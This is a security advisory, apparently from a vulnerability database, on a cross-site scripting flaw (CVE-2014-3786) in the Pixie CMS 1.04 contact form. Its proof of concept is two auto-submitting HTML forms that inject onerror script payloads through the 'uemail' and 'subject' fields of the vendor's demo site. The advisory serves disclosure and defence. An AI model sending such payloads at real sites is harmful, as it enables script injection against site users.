Pixie CMS 1.04 Cross Site Scripting

2014.05.31
Credit: Filippos
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities Vendor: Pixie CMS Product web page: http://www.getpixie.co.uk Affected version: 1.04 Severity: Medium CVE: CVE-2014-3786 Demo page: http://demo.getpixie.co.uk Discovered by: Filippos Mastrogiannis (@filipposmastro) & Simone Memoli (@Simon90_Italy) Pixie is a free, open source CMS software a.k.a a small, simple, website maker (as the vendor states on its website) Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in the Contact form (contact.php). The user input through the POST parameters 'uemail' and 'subject' are not properly sanitized allowing the attacker to execute HTML code into user's browser session on the affected site. The vulnerable component is the contact module of the Pixie v1.04 and it can be found at (/pixie_v1.04/admin/modules/contact.php) of the source code Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7 with Mozilla Firefox 29.0.1 Proof Of Concept: <html> <title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title> <form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post"> <input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'> <input type="hidden" name='contact' value='1'> <input type="hidden" name='subject' value='xss'> </form> <script>document.xss.submit();</script> </html> <html> <title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title> <form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post"> <input type="hidden" name='uemail' value='xss'> <input type="hidden" name='contact' value='1'> <input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'> </form> <script>document.xss.submit();</script> </html> Disclosure Timeline: [13.05.2014] Vulnerabilities discovered. [13.05.2014] Initial contact with the vendor. [15.05.2014] 1st response from the official maintainer. [30.05.2014] 2nd response from the official maintainer. [30.05.2014] Public security advisory released.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top